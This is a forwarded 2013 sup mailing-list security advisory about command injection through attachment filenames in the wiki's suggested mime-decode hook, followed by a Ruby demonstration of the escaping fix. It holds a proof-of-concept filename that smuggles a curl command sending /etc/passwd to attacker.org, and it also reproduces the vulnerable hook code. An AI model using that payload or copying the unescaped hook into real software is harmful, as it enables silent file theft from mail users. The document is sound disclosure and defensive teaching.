From: Gaute Hope
To: sup-talk, sup-devel
Date: Sun, 18 Aug 2013 20:14:38 +0200
Subject: Fwd: Security issue with suggested configuration of sup
Message-ID: <1376849419-sup-8191@qwerzila>

Greetings suppers,

joernchen has pointed out to me that our suggested hook for viewing HTML
attachments has a serious security issue. The updated suggestion in [0]
(wiki) should be safer. Please make sure that you update your mime-decode
hook!

Best regards, Gaute

[0] https://github.com/sup-heliotrope/sup/wiki/Viewing-Attachments

--- Begin forwarded message from joernchen ---

From: joernchen <...>
To: eg
Date: Sat, 17 Aug 2013 14:14:29 +0200
Subject: Security issue with suggested configuration of sup

[...]

At [0] the suggested configuration for viewing HTML attachments with sup
using the mime-decode hook is given as follows:

    unless sibling_types.member? "text/plain"
      case content_type
      when "text/html"
        `/usr/bin/w3m -dump -T #{content_type} '#{filename}'`
      end
    end

This piece of code however is prone to command injection via the file name
of the attached file. The command injection triggers upon sup indexing the
mail, so no user interaction is needed. A better approach would be the
following:

    require 'shellwords'

    unless sibling_types.member? "text/plain"
      case content_type
      when "text/html"
        `/usr/bin/w3m -dump -T #{content_type} #{Shellwords.escape filename}`
      end
    end

[...]

A simple PoC would be sending an email with a file attachment named like:

    '$(cd .. && cd .. && cd .. && cd .. && cd etc && curl --data @passwd attacker.org)'.html

to a sup user making use of the suggested decode hook.

[0] https://github.com/sup-heliotrope/sup/wiki/Viewing-Attachments

[...]
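The following is an added Ruby example, not code from the message or from the sup wiki, showing why the single-quoted interpolation above is unsafe and why Shellwords.escape fixes it. It swaps echo in for w3m so it runs anywhere, uses a harmless command substitution in the constructed filename, and goes one step beyond the message with an argv-style call that never involves a shell.

```ruby
require 'shellwords'
require 'open3'

# Constructed attachment name of the shape the report describes: the leading
# quote closes the hook's '...' quoting and $( ) asks the shell to run a
# command. A harmless echo stands in for the report's curl payload.
CRAFTED_NAME = "'$(echo INJECTED)'.html"

# The shell line the original wiki hook built, with echo in place of w3m.
# Wrapping the name in single quotes is not enough: a name that contains a
# single quote ends the quoting early, and the rest is parsed as shell syntax.
def original_hook(filename)
  `echo '#{filename}'`.chomp
end

# The hook as corrected in the report: Shellwords.escape backslash-escapes
# every shell metacharacter, so the name reaches the command as one literal word.
def escaped_hook(filename)
  `echo #{Shellwords.escape filename}`.chomp
end

# Assumption: this argv-style variant is not in the report. Passing the
# program and its arguments separately skips the shell entirely, so there is
# nothing left to escape and nothing the filename can inject into.
def argv_hook(filename)
  out, _status = Open3.capture2('echo', filename)
  out.chomp
end

if __FILE__ == $PROGRAM_NAME
  puts "original: #{original_hook(CRAFTED_NAME)}"  # INJECTED.html  (substitution ran)
  puts "escaped:  #{escaped_hook(CRAFTED_NAME)}"   # '$(echo INJECTED)'.html
  puts "argv:     #{argv_hook(CRAFTED_NAME)}"      # '$(echo INJECTED)'.html
end
```

The first line shows the command substitution executed inside the hook; the other two show the filename surviving as plain data.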